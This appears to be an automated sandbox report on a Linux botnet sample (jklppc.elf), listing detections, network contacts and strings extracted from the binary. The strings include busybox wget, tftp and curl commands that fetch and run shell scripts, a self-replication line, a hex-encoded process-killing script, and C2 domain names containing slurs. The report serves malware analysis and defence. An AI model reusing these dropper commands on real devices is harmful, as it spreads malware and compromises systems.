Linux Analysis Report
jklppc.elf

Overview

General Information

Sample name: jklppc.elf
Analysis ID: 1543104
MD5: 5df7d4d2b8e1208b3bc9024b9c8c056a
SHA1: e1e4b55542b2ff0b1192acd60fbeccd7b0f93753
SHA256: a572b66ee17774566a6b9c6cd5d998fa3a4e6091b22d6fc680c952808e678bbf
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: jklppc.elf ReversingLabs: Detection: 52%
Source: jklppc.elf Virustotal: Detection: 52% Perma Link
Source: jklppc.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0

Networking

barindex
Source: global traffic TCP traffic: 45.156.86.24 ports 38241,1,2,3,4,8
Source: global traffic TCP traffic: 192.168.2.15:55546 -> 45.156.86.24:38241
Source: /tmp/jklppc.elf (PID: 5670) Socket: 127.0.0.1:39148 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 54.40.68.121
Source: unknown TCP traffic detected without corresponding DNS query: 54.40.68.121
Source: unknown TCP traffic detected without corresponding DNS query: 212.52.255.157
Source: unknown TCP traffic detected without corresponding DNS query: 212.52.255.157
Source: unknown TCP traffic detected without corresponding DNS query: 203.177.243.178
Source: unknown TCP traffic detected without corresponding DNS query: 203.177.243.178
Source: unknown TCP traffic detected without corresponding DNS query: 133.95.54.0
Source: unknown TCP traffic detected without corresponding DNS query: 133.95.54.0
Source: unknown TCP traffic detected without corresponding DNS query: 128.239.240.29
Source: unknown TCP traffic detected without corresponding DNS query: 128.239.240.29
Source: unknown TCP traffic detected without corresponding DNS query: 8.37.14.197
Source: unknown TCP traffic detected without corresponding DNS query: 8.37.14.197
Source: unknown TCP traffic detected without corresponding DNS query: 47.250.178.158
Source: unknown TCP traffic detected without corresponding DNS query: 45.215.2.31
Source: unknown TCP traffic detected without corresponding DNS query: 47.250.178.158
Source: unknown TCP traffic detected without corresponding DNS query: 45.215.2.31
Source: unknown TCP traffic detected without corresponding DNS query: 159.103.148.178
Source: unknown TCP traffic detected without corresponding DNS query: 159.103.148.178
Source: unknown TCP traffic detected without corresponding DNS query: 144.56.155.214
Source: unknown TCP traffic detected without corresponding DNS query: 144.56.155.214
Source: unknown TCP traffic detected without corresponding DNS query: 187.202.216.251
Source: unknown TCP traffic detected without corresponding DNS query: 199.11.17.142
Source: unknown TCP traffic detected without corresponding DNS query: 187.202.216.251
Source: unknown TCP traffic detected without corresponding DNS query: 199.11.17.142
Source: unknown TCP traffic detected without corresponding DNS query: 124.51.26.237
Source: unknown TCP traffic detected without corresponding DNS query: 129.70.24.160
Source: unknown TCP traffic detected without corresponding DNS query: 124.51.26.237
Source: unknown TCP traffic detected without corresponding DNS query: 9.139.64.179
Source: unknown TCP traffic detected without corresponding DNS query: 129.70.24.160
Source: unknown TCP traffic detected without corresponding DNS query: 95.219.159.162
Source: unknown TCP traffic detected without corresponding DNS query: 9.139.64.179
Source: unknown TCP traffic detected without corresponding DNS query: 197.90.180.125
Source: unknown TCP traffic detected without corresponding DNS query: 95.219.159.162
Source: unknown TCP traffic detected without corresponding DNS query: 197.90.180.125
Source: unknown TCP traffic detected without corresponding DNS query: 150.88.197.176
Source: unknown TCP traffic detected without corresponding DNS query: 43.120.39.235
Source: unknown TCP traffic detected without corresponding DNS query: 150.88.197.176
Source: unknown TCP traffic detected without corresponding DNS query: 161.150.111.91
Source: unknown TCP traffic detected without corresponding DNS query: 43.120.39.235
Source: unknown TCP traffic detected without corresponding DNS query: 123.246.162.109
Source: unknown TCP traffic detected without corresponding DNS query: 161.150.111.91
Source: unknown TCP traffic detected without corresponding DNS query: 47.94.215.54
Source: unknown TCP traffic detected without corresponding DNS query: 123.246.162.109
Source: unknown TCP traffic detected without corresponding DNS query: 56.12.5.12
Source: unknown TCP traffic detected without corresponding DNS query: 47.94.215.54
Source: unknown TCP traffic detected without corresponding DNS query: 172.87.21.105
Source: unknown TCP traffic detected without corresponding DNS query: 56.12.5.12
Source: unknown TCP traffic detected without corresponding DNS query: 129.67.96.152
Source: unknown TCP traffic detected without corresponding DNS query: 172.87.21.105
Source: unknown TCP traffic detected without corresponding DNS query: 3.108.179.194
Source: global traffic DNS traffic detected: DNS query: netfags.geek
Source: global traffic DNS traffic detected: DNS query: yellowchink.pirate
Source: jklppc.elf String found in binary or memory: http:///curl.sh
Source: jklppc.elf String found in binary or memory: http:///wget.sh
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal52.troj.linELF@0/107@2/0
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5690/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5690/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5680/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5680/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5680/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5680/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5691/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5691/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5692/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5692/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5692/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5692/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5693/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5693/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5693/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5693/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5694/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5694/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5694/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5694/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5695/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5695/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5696/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5696/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5697/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5697/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5706/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5706/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5698/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5698/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5699/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5699/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5700/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5700/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5701/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5701/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5702/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5702/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5703/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5703/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5704/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5704/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5705/maps Jump to behavior
Source: /tmp/jklppc.elf (PID: 5676) File opened: /proc/5705/cmdline Jump to behavior
Source: /tmp/jklppc.elf (PID: 5670) Queries kernel information via 'uname': Jump to behavior
Source: jklppc.elf, 5670.1.00005613bfb7c000.00005613bfc2c000.rw-.sdmp, jklppc.elf, 5674.1.00005613bfb7c000.00005613bfc2c000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: jklppc.elf, 5670.1.00005613bfb7c000.00005613bfc2c000.rw-.sdmp, jklppc.elf, 5674.1.00005613bfb7c000.00005613bfc2c000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: jklppc.elf, 5670.1.00007fff9d5ba000.00007fff9d5db000.rw-.sdmp, jklppc.elf, 5674.1.00007fff9d5ba000.00007fff9d5db000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
Source: jklppc.elf, 5670.1.00007fff9d5ba000.00007fff9d5db000.rw-.sdmp, jklppc.elf, 5674.1.00007fff9d5ba000.00007fff9d5db000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/jklppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/jklppc.elf
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs